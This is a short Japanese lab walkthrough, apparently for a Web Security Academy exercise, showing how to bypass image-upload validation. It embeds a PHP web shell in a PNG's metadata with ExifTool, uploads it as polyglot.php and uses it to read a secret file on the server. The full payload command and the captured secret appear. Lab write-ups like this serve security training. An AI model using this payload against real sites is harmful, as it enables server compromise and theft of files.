Hello there, ('ω')ノ
polyglot webシェルアップロードによるリモートコード実行を。
まずは、ログインして。
いつもどおり悪意のあるPHPファイルをアップロードすると。
イメージファイルではないとのことで。
リピータで、ヌルバイトと拡張子を追加してSendしてみると。
同じく、イメージファイルではないとのことで。
とりあえず、ExifToolをダウンロードすることに。
これは、写真や画像やメディアファイルからメタデータを取得したり。
追加したり変更したりできるツールで。
https://exiftool.jp.uptodown.com/windows/download
解凍してあとは、名前をexiftoolにしておいて。
適当な画像ファイルにコメントとしてPHPファイルのコードを追加することに。
'START'と'END'は、位置を特定しやすくするために。
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test.png -o polyglot.php
画像に悪意のコードを追加したPHPファイルをアップロードすると。
画像データとみなして拡張子が.phpでもアップロードできて。
アップロードした位置を確認して。
直接、URLにアクセスしてみると。
https://ac7d1f901ea31adac03944b300860092.web-security-academy.net/files/avatars/polyglot.php
取得したコードを入力すると、クリアできて。
mVe9eMTpecNDL0yPbiege4ef5eeVzjLt
Best regards, (^^ゞ
